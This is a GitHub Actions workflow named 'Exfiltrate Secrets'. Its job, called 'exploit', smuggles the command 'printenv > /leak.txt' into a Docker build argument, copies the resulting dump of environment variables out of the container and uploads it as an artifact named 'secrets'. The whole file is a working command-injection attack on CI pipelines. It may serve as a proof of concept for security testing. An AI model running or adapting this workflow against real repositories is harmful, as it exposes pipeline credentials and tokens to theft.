name: Exfiltrate Secrets

on:
  push:

jobs:
  exploit:
    runs-on: ubuntu-latest
    env:
      PYTHON_VERSION: 'printenv > /leak.txt'
    steps:
      - name: Checkout repo
        uses: actions/checkout@v4

      - name: Build Docker image with injected build arg
        run: |
          docker build --build-arg PYTHON_VERSION="$PYTHON_VERSION" -t hacked-image .

      - name: Extract /leak.txt from container
        run: |
          docker run --rm hacked-image cat /leak.txt > leak.txt

      - name: Upload leaked secrets
        uses: actions/upload-artifact@v4
        with:
          name: secrets
          path: leak.txt
